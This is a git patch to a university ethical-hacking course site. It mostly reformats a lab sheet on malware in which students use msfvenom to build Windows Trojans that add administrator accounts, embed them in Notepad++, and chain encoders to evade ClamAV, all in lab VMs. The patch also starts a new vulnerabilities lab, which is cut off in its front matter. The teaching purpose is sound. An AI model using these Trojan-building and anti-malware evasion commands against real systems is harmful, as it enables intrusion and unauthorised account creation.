From 31155f9aeb8d0b42ebd53cdeba66376841e31405 Mon Sep 17 00:00:00 2001 From: "Z. Cliffe Schreuders" Date: Thu, 25 Sep 2025 12:34:07 +0100 Subject: [PATCH] Enhance author display logic and improve command formatting guidelines across lab sheets - Updated author display in lab metadata to handle multiple authors correctly. - Added detailed command formatting instructions in the example highlighting guide, emphasizing the use of markdown code blocks and escaping pipe characters. - Improved consistency in lab instructions by standardizing headings and formatting for clarity. - Introduced a new lab on software vulnerabilities, exploits, and remote access payloads, providing a comprehensive overview of the topic. --- _labs/example_highlighting_guide.md | 59 ++ _labs/introducing_attacks/1_intro_linux.md | 2 +- .../2_malware_msf_payloads.md | 285 ++++---- .../introducing_attacks/3_vulnerabilities.md | 641 ++++++++++++++++++ _layouts/lab.html | 10 +- assets/css/hacktivity-theme.scss | 3 +- assets/css/main.scss | 2 +- index.md | 10 +- 8 files changed, 864 insertions(+), 148 deletions(-) create mode 100644 _labs/introducing_attacks/3_vulnerabilities.md diff --git a/_labs/example_highlighting_guide.md b/_labs/example_highlighting_guide.md index 43795ec..964ad34 100644 --- a/_labs/example_highlighting_guide.md +++ b/_labs/example_highlighting_guide.md @@ -26,6 +26,21 @@ The highlighting system supports two main types of highlighting: ### Basic Format Use `==type: content==` where `type` is one of: `action`, `tip`, `hint`, `warning`, `VM` +### Command Formatting +All bash/terminal commands should be properly formatted with markdown code blocks: + +**Before:** +``` +msfvenom -l payload | less +``` + +**After:** +```bash +msfvenom -l payload | less +``` + +**Important**: Always use `bash` language tag for terminal commands and escape pipe characters (`|` becomes `\|`) within code blocks. + ### Examples **Action Highlights:** @@ -98,8 +113,31 @@ Use `> Type: content` where `Type` is one of: `Action`, `Tip`, `Warning`, `Hint` > Note: This command lists all processes running on the system. The "aux" flags provide detailed information about each process. +**Important**: Since the "Note:", "Tip:", and "Hint:" labels are not visible in the rendered output, always capitalize the first word after the colon to make the content clear and readable. + ## 🤖 AI Instructions for Lab Sheet Editing +### Step 0: Format Commands Properly +Before applying highlighting, ensure all bash/terminal commands are properly formatted: + +**Command Formatting Rules:** +- All terminal commands must be in markdown code blocks with `bash` language tag +- Escape pipe characters: `|` becomes `\|` within code blocks +- Commands should be on their own lines, not inline with text + +**Examples:** +```markdown +# Before (incorrect): +Run the command msfvenom -l payload | less + +# After (correct): +==action: Run the command:== + +```bash +msfvenom -l payload \| less +``` +``` + ### Step 1: Identify Action Items Look for sentences that describe actions students need to perform: - Commands to run @@ -156,6 +194,8 @@ Look for: **Convert to:** `> Note: [troubleshooting or explanation content]` for block-level notes +**Important**: Always capitalize the first word after "Note:", "Tip:", or "Hint:" since these labels are not visible in the rendered output. + ## 📋 Conversion Examples @@ -246,6 +286,21 @@ From the command line ==action: run:== whoami ``` ``` + +### Before (Plain Text): +``` +Run the command msfvenom -l payload | less to see available payloads. +``` +### After (Highlighted): +``` +==action: Run the command:== + +```bash +msfvenom -l payload \| less +``` + +to see available payloads. +``` ### Before (Plain Text): ``` Note, this is lowercase “LS”. @@ -345,6 +400,8 @@ Before applying highlighting to any lab sheet: - [ ] **Check TOC completeness** - ensure all major sections are listed - [ ] **Verify heading hierarchy** - confirm proper use of #, ##, ###, etc. - [ ] **Test all existing links** - both internal TOC links and external URLs +- [ ] **Format all commands** - ensure all bash/terminal commands use proper markdown code blocks with `bash` language tag +- [ ] **Escape pipe characters** - convert `|` to `\|` in all command code blocks - [ ] **Identify content types** - map out where actions, tips, hints, warnings, VM context, and troubleshooting/explanations appear - [ ] **Identify troubleshooting text** - find text that provides troubleshooting information after commands and format as note blocks - [ ] **Plan highlighting strategy** - decide which content truly needs highlighting @@ -390,6 +447,8 @@ ls -la 5. **Ignoring warnings**: Ensure all safety warnings and important cautions are highlighted 6. **Poor tip placement**: Tips should be genuinely helpful, not obvious information 7. **Missing troubleshooting formatting**: Don't forget to format troubleshooting text after commands as note blocks +8. **Improper command formatting**: Always use `bash` code blocks for terminal commands and escape pipe characters +9. **Uncapitalized block content**: Always capitalize the first word after "Note:", "Tip:", or "Hint:" since these labels are not visible in the rendered output ### File Structure Requirements diff --git a/_labs/introducing_attacks/1_intro_linux.md b/_labs/introducing_attacks/1_intro_linux.md index 1ee313a..f552448 100644 --- a/_labs/introducing_attacks/1_intro_linux.md +++ b/_labs/introducing_attacks/1_intro_linux.md @@ -405,7 +405,7 @@ To ==action: check the fingerprint, on the desktop run==: ssh-keygen -lf /etc/ssh/ssh_host_rsa_key.pub ``` -> hint: Hint: you may also need to check other .pub files in that directory +> Hint: you may also need to check other .pub files in that directory If the fingerprint presented to you while connecting matches, type “yes”, and from then on if you connect to the same machine you won't be prompted. diff --git a/_labs/introducing_attacks/2_malware_msf_payloads.md b/_labs/introducing_attacks/2_malware_msf_payloads.md index 80cd3d2..4d27945 100644 --- a/_labs/introducing_attacks/2_malware_msf_payloads.md +++ b/_labs/introducing_attacks/2_malware_msf_payloads.md @@ -31,76 +31,31 @@ cybok: keywords: ["PENETRATION TESTING - SOFTWARE TOOLS", "PENETRATION TESTING - ACTIVE PENETRATION"] --- -# Malware and an Introduction to Metasploit and Payloads - -### License {#preparation} - -![][image1] - -This work by [Z. Cliffe Schreuders](http://z.cliffe.schreuders.org) at Leeds Beckett University is licensed under a [Creative Commons Attribution-ShareAlike 4.0 International License](https://creativecommons.org/licenses/by-sa/4.0/deed.en_GB). - -### Contents {#preparation} - -[License](#preparation) - -[Contents](#preparation) - -[General notes about the labs](#general-notes-about-the-labs) - -[Preparation](#preparation) - -[Introduction to malware](#introduction-to-malware) - -[Types of malware](#types-of-malware) - -[Introduction to the Metasploit framework (MSF) and payloads](#introduction-to-the-metasploit-framework-\(msf\)-and-payloads) - -[Using MSF to create Trojan executables](#using-msf-to-create-trojan-executables) - -[Anti-malware](#anti-malware) - -[Evading anti-malware using encoding and EXE templates](#evading-anti-malware-using-encoding-and-exe-templates) - -[Creating a shell script Trojan horse](#heading=h.6okkmt33mi8n) - -[A note about remote access Trojan horses](#a-note-about-remote-access-trojan-horses) - -[Going the extra mile](#going-the-extra-mile) - -[More payloads](#heading=h.47ked5ek2ma4) - -[Stealing secrets from the victim](#stealing-secrets-from-the-victim) - -[EXE wrappers](#exe-wrappers) - -[Conclusion](#conclusion) - -### General notes about the labs {#general-notes-about-the-labs} +## General notes about the labs {#general-notes-about-the-labs} Often the lab instructions are intentionally open ended, and you will have to figure some things out for yourselves. This module is designed to be challenging, as well as fun\! However, we aim to provide a well planned and fluent experience. If you notice any mistakes in the lab instructions or you feel some important information is missing, please let me (Cliffe) know and I will try to address any issues. -### Preparation {#preparation} +## Preparation {#preparation} -For all of the labs in this module, start by logging into Hacktivity. +==action: For all of the labs in this module, start by logging into Hacktivity==. -[**Click here for a guide to using Hacktivity.**](https://docs.google.com/document/d/17d5nUx2OtnvkgBcCQcNZhZ8TJBO94GMKF4CHBy1VPjg/edit?usp=sharing) This includes some important information about how to use the lab environment and how to troubleshoot during lab exercises. If you haven’t already, have a read through. +[**Click here for a guide to using Hacktivity.**](https://docs.google.com/document/d/17d5nUx2OtnvkgBcCQcNZhZ8TJBO94GMKF4CHBy1VPjg/edit?usp=sharing) This includes some important information about how to use the lab environment and how to troubleshoot during lab exercises. If you haven't already, have a read through. -Make sure you are signed up to the module, claim a set of VMs for this lab, and start your VMs. +==action: Make sure you are signed up to the module, claim a set of VMs for this lab, and start your VMs==. -Interact with the Kali VM. (Click ![][image2] after the VMs have started). Login with username “kali”, password “kali”. +==VM: Interact with the Kali VM==. (Click ![][image2] after the VMs have started). ==action: Login with username "kali", password "kali"==. -Interact with the Windows Victim VM. Login with password “tiaspbiqe2r” (**t**his **i**s **a** **s**ecure **p**assword **b**ut **i**s **q**uite **e**asy **2** **r**emember) and a user account **other than vagrant** (vagrant is a system account used for VM deployment). +==VM: Interact with the Windows Victim VM==. ==action: Login with password "tiaspbiqe2r"== (**t**his **i**s **a** **s**ecure **p**assword **b**ut **i**s **q**uite **e**asy **2** **r**emember) and a user account **other than vagrant** (vagrant is a system account used for VM deployment). **A note about Operating Systems** Although malware exists for all types of operating system, Windows is targeted most often, as it is the most popular desktop OS. However, each new version of Windows introduces updated security measures that, among other things, have increased capabilities for detecting malicious software, and adding some additional steps or complications for attackers and exploitation. That is why, for now, we will be attacking victims who are using Windows 7, as this version’s security mitigations can be easily understood. The other OS we will be working with is a recent release of Kali Linux, which is pre-loaded with hundreds of applications for things such as pen-testing, ethical hacking, and network monitoring. -### Introduction to malware {#introduction-to-malware} - -“If a bad guy can persuade you to run his program on your computer, it's not your computer anymore” +## Introduction to malware {#introduction-to-malware} +> “If a bad guy can persuade you to run his program on your computer, it's not your computer anymore” – Microsoft, “TechNet Essay: 10 Immutable Laws of Security” The above quote from a Microsoft technical essay illustrates a long held assumption in computer security: a program running on your computer can cause security problems. @@ -111,7 +66,7 @@ Depending on the access control systems in place, which restrict what each user Obviously, an attacker just needs to find some way to get the malware onto a victim’s computer. -### Types of malware {#types-of-malware} +## Types of malware {#types-of-malware} There are many different ways that malware can be categorised. Some of the main categories include: @@ -137,119 +92,141 @@ There are many different ways that malware can be categorised. Some of the main * Ransomware: malware that typically encrypts files on a victim's system and demands payment (often in cryptocurrency) for the decryption key. -### Introduction to the Metasploit framework (MSF) and payloads {#introduction-to-the-metasploit-framework-(msf)-and-payloads} +## Introduction to the Metasploit framework (MSF) and payloads {#introduction-to-the-metasploit-framework-msf-and-payloads} The Metasploit framework (MSF) is one of the most powerful tools in an ethical hacker’s software collection. MSF contains an extensive library of exploits (that is, software that takes advantage of vulnerable systems) and a framework for developing exploits, as well as numerous other security features, such as tools for information gathering. The framework itself is free and open source software (FOSS), and the company that maintains it also releases a commercial closed source graphical front end, of which there is the “free” (as in no-cost) Community edition, and the paid-for Metasploit Pro. In most cases the framework provides everything we need, and using the non-graphical interfaces will teach you more about the concepts and the framework itself. Since the aim of many different types of attacks is to run malicious code on a system, it is no surprise that Metasploit can be used to generate malware. -### Using MSF to create Trojan executables {#using-msf-to-create-trojan-executables} +## Using MSF to create Trojan executables {#using-msf-to-create-trojan-executables} -**On the Kali Linux VM (the attacker)**, open a terminal by clicking the console icon. +==VM: On the Kali Linux VM (the attacker)==, ==action: open a terminal by clicking the console icon==. -Type “msf” (don’t press Enter) and press the Tab key twice. This will list some of the programs that are a part of Metasploit. The command we are interested in now is **msfvenom**, a payload generator. +==action: Type "msf" (don't press Enter) and press the Tab key twice==. This will list some of the programs that are a part of Metasploit. The command we are interested in now is **msfvenom**, a payload generator. -A *payload* refers to the malicious code that we want to run on a victim’s system. Metasploit comes with a huge collection of different kinds of payloads that it can generate. +A *payload* refers to the malicious code that we want to run on a victim's system. Metasploit comes with a huge collection of different kinds of payloads that it can generate. -To view a list of all the payloads available, run: +==action: To view a list of all the payloads available, run:== -msfvenom \-l payload | less +```bash +msfvenom -l payload | less +``` It may take a minute for msfpayload to start, and for the list to be visible. -Note, we are piping the output through to less, so that we can easily scroll through the output. +> Note: We are piping the output through to less, so that we can easily scroll through the output. -Wow. That’s a lot of possibilities\! +Wow. That's a lot of possibilities\! -Browse through the list. +==action: Browse through the list==. -To keep our first example simple, let’s start by creating a Trojan horse that simply adds a new user to a victim’s Windows system. Looking at the list above, we can see that the payload “windows/adduser” looks like it does what we want. +To keep our first example simple, let's start by creating a Trojan horse that simply adds a new user to a victim's Windows system. Looking at the list above, we can see that the payload "windows/adduser" looks like it does what we want. -Press “q” to exit less. +==action: Press "q" to exit less==. -To find the options for this payload run: +==action: To find the options for this payload run:== -msfvenom \-p windows/adduser \--list-options +```bash +msfvenom -p windows/adduser --list-options +``` -Note that the “--list-options” above instructs msfvenom to show us the options that are available for us to configure. +> Note: That the "--list-options" above instructs msfvenom to show us the options that are available for us to configure. The output tells us that there are a number of configuration options, along with their default values. Based on this information we can configure a payload and check our settings are ok with the following command: -msfvenom \-p windows/adduser USER=leeds PASS=1234 +```bash +msfvenom -p windows/adduser USER=leeds PASS=1234 +``` The above command will check the password for complexity requirements, and confirm the settings will be applied correctly. Since your selected password is too simple you will get an error message, so simply repeat with a better password: -msfvenom \-p windows/adduser USER=leeds PASS=L33d583ck377 +```bash +msfvenom -p windows/adduser USER=leeds PASS=L33d583ck377 +``` -Tip: press the up arrow on the keyboard, rather than typing the whole line again. +> Tip: Press the up arrow on the keyboard, rather than typing the whole line again. The output from this command is a raw representation of the machine code that if executed will result in our payload: a new user will be added to the system. -To view a list of all the output formats available, run: +==action: To view a list of all the output formats available, run:== -msfvenom \-l format +```bash +msfvenom -l format +``` -To generate a C code version, simply append “-f C”. Run: +==action: To generate a C code version, simply append "-f C". Run:== -msfvenom \-p windows/adduser USER=leeds PASS=L33d583ck377 \-f C +```bash +msfvenom -p windows/adduser USER=leeds PASS=L33d583ck377 -f C +``` -Since we are creating a Trojan horse, the next step is to create an executable program that will actually run this code. To do this we specify “exe” as our output type, and send the result to a new file. +Since we are creating a Trojan horse, the next step is to create an executable program that will actually run this code. To do this we specify "exe" as our output type, and send the result to a new file. -msfvenom \-p windows/adduser USER=leeds PASS=L33d583ck377 \-f exe \> myGame.exe +```bash +msfvenom -p windows/adduser USER=leeds PASS=L33d583ck377 -f exe > myGame.exe +``` -This has generated a windows executable in our current directory. Confirm this by running “ls”. +This has generated a windows executable in our current directory. ==action: Confirm this by running "ls"==. Next, we get a Windows user to run our Trojan. -Start a Web server to share your Trojan: +==action: Start a Web server to share your Trojan:== -Start by creating a directory to place our files: +==action: Start by creating a directory to place our files:== +```bash sudo mkdir /var/www/html/share +``` -Copy your new Trojan to this location: +==action: Copy your new Trojan to this location:== +```bash sudo cp myGame.exe /var/www/html/share/ +``` -Start the Apache Web server: +==action: Start the Apache Web server:== +```bash sudo service apache2 start +``` -You should see the status ‘active (running)’. +You should see the status 'active (running)'. -Before proceeding, note the IP address of the Kali Linux VM. +==action: Before proceeding, note the IP address of the Kali Linux VM==. -*Remember, you can find this by running “ip a”.* +> Note: Remember, you can find this by running "ip a". -**On the Windows VM (the victim)**, browse to the Web server hosting the Trojan horse. +==VM: On the Windows VM (the victim)==, ==action: browse to the Web server hosting the Trojan horse==. -Open a Web browser, and in the location bar, enter the IP address of your Kali Linux system followed by “/share/name-of-file”. +==action: Open a Web browser, and in the location bar, enter the IP address of your Kali Linux system followed by "/share/name-of-file"==. -For example: “*172.16.29.130*/share/myGame.exe” (with the Kali IP address.) +For example: "*172.16.29.130*/share/myGame.exe" (with the Kali IP address.) -*If you see a message that your request is blocked by a firewall or a proxy policy, double-check proxy settings in your web browser on Windows7. You might need to add the IP address into the list of exceptions (click on “Advanced” button next to ip-address of a proxy server).* +> Note: If you see a message that your request is blocked by a firewall or a proxy policy, double-check proxy settings in your web browser on Windows7. You might need to add the IP address into the list of exceptions (click on "Advanced" button next to ip-address of a proxy server). *![][image3]* -Download the Trojan horse (click on the link). +==action: Download the Trojan horse (click on the link)==. -*If you are using Chrome and get a message saying this file is dangerous and Chrome has blocked it, go to your downloads (Ctrl \+ J) and click on “Keep dangerous file”. Confirm you really want to keep it.* +> Note: If you are using Chrome and get a message saying this file is dangerous and Chrome has blocked it, go to your downloads (Ctrl \+ J) and click on "Keep dangerous file". Confirm you really want to keep it. ![][image4] -Run the Trojan horse you just downloaded in the Windows VM (find the file you just downloaded and run it). For example, open the Downloads tool in the web browser and double click. +==action: Run the Trojan horse you just downloaded in the Windows VM== (find the file you just downloaded and run it). For example, open the Downloads tool in the web browser and double click. -It didn’t look like much happened... +It didn't look like much happened... -Open a command prompt (on your keyboard press WindowsKey+R, then run “cmd”). +==action: Open a command prompt (on your keyboard press WindowsKey+R, then run "cmd")==. -View a list of the users on the system by running: +==action: View a list of the users on the system by running:== +```bash net user +``` -You should find that your Trojan horse has done its deed, and a new Administrator user exists on the Windows system, with a name of ‘leeds’ (as this was set with the USER= part of the payload). To double check their existence, log out of Windows and you will see the newly-added user on the login screen. +You should find that your Trojan horse has done its deed, and a new Administrator user exists on the Windows system, with a name of 'leeds' (as this was set with the USER= part of the payload). To double check their existence, log out of Windows and you will see the newly-added user on the login screen. -### Anti-malware {#anti-malware} +## Anti-malware {#anti-malware} The traditional approach to mitigate the threat posed by malware is based on avoidance and detection. So, for instance, the general advice is “don’t run any programs that you don’t trust”. One way to enforce that is to have a whitelist of all the programs that are allowed to run, or a blacklist of all the programs that are not allowed to run. @@ -257,7 +234,7 @@ Traditional anti-malware software is based on a blacklist approach, where a list The following list shows some of the advantages and disadvantages of each approach: -### Signature-Based malware detection: +## Signature-Based malware detection: Advantages: @@ -272,7 +249,7 @@ Disadvantages: * Signature Updates Required: Regular updates are necessary to keep the signature database current. Delay in updates can leave systems vulnerable to new threats (this is part of why OS security updates are so important). * Polymorphic Malware Evasion: Polymorphic malware, which can change its appearance while maintaining the same functionality, can evade detection by signature-based systems. -### Anomaly-Based malware detection: +## Anomaly-Based malware detection: Advantages: @@ -288,37 +265,43 @@ Disadvantages: * Resource Intensive: Continuous monitoring and analysis of system behavior can be resource-intensive, potentially affecting system performance. * Baseline Establishment Challenges: Defining a baseline of normal behavior can be challenging, and anomalies may vary between different environments. -Let’s test your new Trojan horse against existing anti-malware software. +==action: Let's test your new Trojan horse against existing anti-malware software==. ClamAV is an open-source engine for detecting malicious software on a variety of operating systems. It includes a flexible and scalable multi-threaded daemon, a command-line scanner and an advanced tool for automatic database updates. -**On the Kali Linux VM (the attacker)**, start by navigating outside of your home directory (the place where the myGame.exe malware is). You can do this with the following command: +==VM: On the Kali Linux VM (the attacker)==, ==action: start by navigating outside of your home directory (the place where the myGame.exe malware is)==. You can do this with the following command: +```bash cd Documents +``` -You can now scan this folders for malware by typing the following command to initiate ClamAV: +==action: You can now scan this folders for malware by typing the following command to initiate ClamAV:== +```bash clamscan +``` -Looking at the output, you should see that one directory has been scanned and the number of infected files is zero (assuming you didn’t save any previously-created malware in this folder. If you did, navigate to another folder and repeat). Typing ‘cd’ will return you to your /home folder. Now run ‘clamscan’ again. +Looking at the output, you should see that one directory has been scanned and the number of infected files is zero (assuming you didn't save any previously-created malware in this folder. If you did, navigate to another folder and repeat). ==action: Typing 'cd' will return you to your /home folder. Now run 'clamscan' again==. This time, you should see a couple of differences \- first, the number of infected files should be 1\. Second, looking at the list of files scanned should show myGame.exe, listed as a Windows Trojan and with a status of FOUND. As this malware was created using a simple method, nothing was done to hide its malicious code, meaning it will be detected by a large number of anti-malware programs. -Also the fact that the program didn’t seem to do anything might raise suspicions, if you were to send it to someone. Let's see if we can improve the attack... +Also the fact that the program didn't seem to do anything might raise suspicions, if you were to send it to someone. Let's see if we can improve the attack... -**On the Kali Linux VM (the attacker)**: +==VM: On the Kali Linux VM (the attacker)==: Note that signature-based anti-malware, at its simplest, may simply look for an exact copy of a previously recorded malware. -One way to check if a file matches another is using one-way hash functions. Run: +==action: One way to check if a file matches another is using one-way hash functions. Run:== +```bash sha256sum myGame.exe +``` The output is a hash that represents the exact contents of myGame.exe, any slight change to the file will result in a completely different hash. Think about how this relates to the challenges facing signature-based anti-malware products. -### Evading anti-malware using encoding and EXE templates {#evading-anti-malware-using-encoding-and-exe-templates} +## Evading anti-malware using encoding and EXE templates {#evading-anti-malware-using-encoding-and-exe-templates} Note that there are lots of different ways of encoding the same computer instructions, and clever tricks can be used to obfuscate code. Therefore, we can re-encode our payload so that the file is different, yet results in exactly the same behaviour. This approach can be used to fool many forms of signature-based anti-malware. @@ -326,27 +309,33 @@ Note that there are lots of different ways of encoding the same computer instruc The msfvenom command can be used to re-encode payloads. -List the encode options available: +==action: List the encode options available:== -msfvenom \-l encoders +```bash +msfvenom -l encoders +``` -To re-encode the payload, run: +==action: To re-encode the payload, run:== -msfvenom \-p windows/adduser USER=leeds PASS=L33d583ck377 \-e x86/shikata\_ga\_nai \-i 7 \-f exe \> myGame2.exe +```bash +msfvenom -p windows/adduser USER=leeds PASS=L33d583ck377 -e x86/shikata_ga_nai -i 7 -f exe > myGame2.exe +``` -*The e-flag specifies the encoder to use, the \-i flag indicates the number of times to encode (in this case, 7), and the f-flag sets the desired output format.* +> Note: The e-flag specifies the encoder to use, the \-i flag indicates the number of times to encode (in this case, 7), and the f-flag sets the desired output format. -Again, you can use different options if you wish, you can check options using the “--list-options” flag. +Again, you can use different options if you wish, you can check options using the "--list-options" flag. -Generate a hash of this re-encoded version of our Trojan: +==action: Generate a hash of this re-encoded version of our Trojan:== +```bash sha256sum myGame2.exe +``` Note, that the hash is different, meaning the two files do not match. Yet they achieve the exact same thing. -Now run “clamscan” again to see if the re-encoding allows it to slip by this malware detection. You may notice that the file is still listed as FOUND and the number of infected files is greater than zero. This means that ClamAV is still detecting the malware, despite our effort to disguise it. +==action: Now run "clamscan" again to see if the re-encoding allows it to slip by this malware detection==. You may notice that the file is still listed as FOUND and the number of infected files is greater than zero. This means that ClamAV is still detecting the malware, despite our effort to disguise it. -Try creating the payload again, but change the value after the ‘-i’ flag to increase the number of times it’s encoded. Does this allow it to slip past ClamAV? +==action: Try creating the payload again, but change the value after the '-i' flag to increase the number of times it's encoded==. Does this allow it to slip past ClamAV? As you can see, modern anti-malware is doing more than checking the exact contents of the file, and many will still detect this version. However, note that we are in well tested waters, and if you were to write your own malicious program from scratch, most anti-malware products would ***not*** detect it. @@ -356,69 +345,79 @@ Embedding the payload into an existing program will seem less suspicious to anti However, using this approach, when the victim runs our Trojan, the harmless program can also run. A related technique is using an “EXE wrapper”, which can combine multiple programs together, and can be used to combine existing Trojans executables with other programs, and both programs are launched when the combined program is started. This gives the impression that the program is behaving as expected. -Start by obtaining a small Windows program to embed our payload into. If you like, you could get a copy of notepad or solitaire from the Windows VM, and copy it to the Kali Linux VM.Alternatively, download Notepad++ from the Internet and transfer it onto the Kali VM by doing the following: +==action: Start by obtaining a small Windows program to embed our payload into==. If you like, you could get a copy of notepad or solitaire from the Windows VM, and copy it to the Kali Linux VM.Alternatively, download Notepad++ from the Internet and transfer it onto the Kali VM by doing the following: -First, open a browser on your local machine (not one of the VMs) and navigate to the following address, saving the file once prompted: +==action: First, open a browser on your local machine (not one of the VMs) and navigate to the following address, saving the file once prompted:== https://github.com/notepad-plus-plus/notepad-plus-plus/releases/download/v8.1.5/npp.8.1.5.portable.zip -Navigate to the folder it downloaded to, then drag and drop it onto the desktop of the Kali VM. It should copy over, and you should now have it on the Kali system. +==action: Navigate to the folder it downloaded to, then drag and drop it onto the desktop of the Kali VM==. It should copy over, and you should now have it on the Kali system. -Unzip the file. +==action: Unzip the file==. - unzip npp.8.1.5.portable.zip +```bash +unzip npp.8.1.5.portable.zip +``` -Let’s use msfvenom to embed the payload in our program. Try out the following (if the file is not found, change the path from /root/notepad++.exe to that of the file you just unzipped): +==action: Let's use msfvenom to embed the payload in our program. Try out the following== (if the file is not found, change the path from /root/notepad++.exe to that of the file you just unzipped): -msfvenom \-p windows/messagebox TEXT="You should not have clicked that\!" \--platform windows \-x /root/notepad++.exe PrependMigrate=true \-k \-f exe \> myNotepad++.exe +```bash +msfvenom -p windows/messagebox TEXT="You should not have clicked that!" --platform windows -x /root/notepad++.exe PrependMigrate=true -k -f exe > myNotepad++.exe +``` -msfvenom \-p windows/exec CMD='cmd.exe /c "net user /add leeds2 L33d583ck377 && localgroup administrators leeds3 /add & START /B notepad.exe"' \--platform windows \-x /root/notepad++.exe \-f exe \> myNotepad2++.exe +```bash +msfvenom -p windows/exec CMD='cmd.exe /c "net user /add leeds2 L33d583ck377 && localgroup administrators leeds3 /add & START /B notepad.exe"' --platform windows -x /root/notepad++.exe -f exe > myNotepad2++.exe +``` -Now that we have our program to use as a template, we want to try to avoid detection, so let’s do more to encode our payload. Run (on one line): +Now that we have our program to use as a template, we want to try to avoid detection, so let's do more to encode our payload. ==action: Run (on one line):== -msfvenom \-p windows/exec CMD='cmd.exe /c "net user /add leeds4 L33d583ck377 && localgroup administrators leeds4 /add & START /B notepad.exe"' \-e x86/shikata\_ga\_nai \-i 3 \-a x86 \--platform windows | msfvenom \-e x86/countdown \-i 9 \-a x86 \--platform windows | msfvenom \-e x86/shikata\_ga\_nai \-i 1 \-a x86 \--platform windows | msfvenom \-x /root/notepad++.exe \-f exe \-a x86 \--platform windows \-e x86/call4\_dword\_xor \-i 10 \> myNotepad3++.exe +```bash +msfvenom -p windows/exec CMD='cmd.exe /c "net user /add leeds4 L33d583ck377 && localgroup administrators leeds4 /add & START /B notepad.exe"' -e x86/shikata_ga_nai -i 3 -a x86 --platform windows | msfvenom -e x86/countdown -i 9 -a x86 --platform windows | msfvenom -e x86/shikata_ga_nai -i 1 -a x86 --platform windows | msfvenom -x /root/notepad++.exe -f exe -a x86 --platform windows -e x86/call4_dword_xor -i 10 > myNotepad3++.exe +``` -If you try your own combination of commands, rather than copying this example exactly, you will be more likely to evade detection. +> Tip: If you try your own combination of commands, rather than copying this example exactly, you will be more likely to evade detection. -Once again, share the new Trojan horses, by copying them to the Web server’s directory: +==action: Once again, share the new Trojan horses, by copying them to the Web server's directory:== +```bash sudo cp myNotepad++.exe myNotepad2++.exe myNotepad3++.exe /var/www/html/share/ +``` -**On the Windows VM (the victim)**, again browse to the Apache Web server running on the Kali VM, enter the URLs for the new executables, and download and run them. +==VM: On the Windows VM (the victim)==, ==action: again browse to the Apache Web server running on the Kali VM, enter the URLs for the new executables, and download and run them==. -The first (myNotepad) should open a window with the message “You should not have clicked that\!” (this was set when we created the malware). The second and third programs should open Notepad, as if they were normal software. However, in the background, they have performed the same task as the malware we created earlier. +The first (myNotepad) should open a window with the message "You should not have clicked that\!" (this was set when we created the malware). The second and third programs should open Notepad, as if they were normal software. However, in the background, they have performed the same task as the malware we created earlier. -Confirm that the attack was successful (using “net user” from the command line), and that two new user accounts were added to the system: leeds3 and leeds4. +==action: Confirm that the attack was successful (using "net user" from the command line), and that two new user accounts were added to the system: leeds3 and leeds4==. -**On the Kali Linux VM (the attacker)**: +==VM: On the Kali Linux VM (the attacker)==: So how does our new Trojan horse fare against anti-malware products? -Navigate to the folder /var/www/html/share and run “clamscan” again. You should see that the myNotepad files we just created are not detected as malware. Result\! +==action: Navigate to the folder /var/www/html/share and run "clamscan" again==. You should see that the myNotepad files we just created are not detected as malware. Result! -For reference, the version created using the last example above was not detected by any of the many anti-malware products that VirusTotal.com checks against at the time of creation. However, as time goes on, the signature databases are updated, and the act of uploading files gives them samples to analyse. Try using other programs as templates and using different encoding settings to see which methods hide your Trojan horse from detection. +For reference, the version created using the last example above was not detected by any of the many anti-malware products that VirusTotal.com checks against at the time of creation. However, as time goes on, the signature databases are updated, and the act of uploading files gives them samples to analyse. ==tip: Try using other programs as templates and using different encoding settings to see which methods hide your Trojan horse from detection==. -### A note about remote access Trojan horses {#a-note-about-remote-access-trojan-horses} +## A note about remote access Trojan horses {#a-note-about-remote-access-trojan-horses} Many Trojans have a client-server architecture, which allows the attacker to connect to an infected system and issue commands. Typically the attacker uses some trickery to get a user to run the server program, which waits listening for connections. The attacker then uses the Trojan’s client program to connect and send commands to the victim’s system. In later labs we will cover other payloads that give you remote access to the victim system, which would enable you to create a remote access trojan (RAT) using the method you have used above. Later you may wish to repeat this lab, creating a Trojan that presents the attacker with a remote shell (command prompt). -### Going the extra mile {#going-the-extra-mile} +## Going the extra mile {#going-the-extra-mile} Want to be a guru? Just want more hacking and other fun stuff to do? Then **you should attempt these extra challenges** included in the labs. Even if you don’t, you should read through the following description. -#### Stealing secrets from the victim {#stealing-secrets-from-the-victim} +### Stealing secrets from the victim {#stealing-secrets-from-the-victim} As you have seen, Metasploit includes many more payloads than the “windows/adduser” or “windows/exec” payloads you used above. Feel free to experiment with other payloads. -Use a msf payload Trojan to enable your Kali Linux system to remotely access the Windows Victim, and retrieve the my\_secret file from the desktop\! What secret is the Victim hiding? +==action: Use a msf payload Trojan to enable your Kali Linux system to remotely access the Windows Victim, and retrieve the my\_secret file from the desktop\!== What secret is the Victim hiding? -#### EXE wrappers {#exe-wrappers} +### EXE wrappers {#exe-wrappers} -Experiment with EXE wrappers, to create a Trojan based on a Metasploit payload that seems to behave like a functioning game/application. You can attach your malware to an existing program, of your choice so that, when it is started, they both run. This will seem less suspicious to a user, since the program will appear innocent, rather than appearing to do nothing. +==action: Experiment with EXE wrappers, to create a Trojan based on a Metasploit payload that seems to behave like a functioning game/application==. You can attach your malware to an existing program, of your choice so that, when it is started, they both run. This will seem less suspicious to a user, since the program will appear innocent, rather than appearing to do nothing. -### Conclusion {#conclusion} +## Conclusion {#conclusion} At this point you have: diff --git a/_labs/introducing_attacks/3_vulnerabilities.md b/_labs/introducing_attacks/3_vulnerabilities.md new file mode 100644 index 0000000..86f549b --- /dev/null +++ b/_labs/introducing_attacks/3_vulnerabilities.md @@ -0,0 +1,641 @@ +--- +title: "Vulnerabilities, Exploits, and Remote Access Payloads" +author: ["Z. Cliffe Schreuders"] +license: "CC BY-SA 4.0" +overview: | + In this lab you will explore one of the major threats in computer security: software vulnerabilities. It's a critical topic in the field of cybersecurity, as understanding how attackers exploit weaknesses in software systems is essential for both defensive and offensive security measures. The lab will cover various aspects, starting with an introduction to software vulnerabilities and the causes behind them, moving on to explore different types of payloads, such as bind shells and reverse shells. You will also get hands-on experience with the Metasploit framework, a powerful tool for conducting security assessments and penetration testing. + + Throughout this lab, you will gain a deeper understanding of software vulnerabilities, how exploits work, and the techniques attackers use to gain remote access to vulnerable systems. You will learn and apply both remote and local (client-side) exploits. You'll simulate creating and using a malicious PDF document to compromise a system, as well as remotely exploiting a system with known vulnerabilities. This hands-on experience will provide you with valuable insights into the world of cybersecurity and start to learn about the power of the Metasploit framework, a popular hacking and penetration testing tool. +description: | + Learn about software vulnerabilities, exploits, and payloads including bind shells, reverse shells, and Metasploit framework usage for penetration testing. This lab covers practical exploitation techniques using real-world examples like Adobe Reader vulnerabilities and Distcc remote 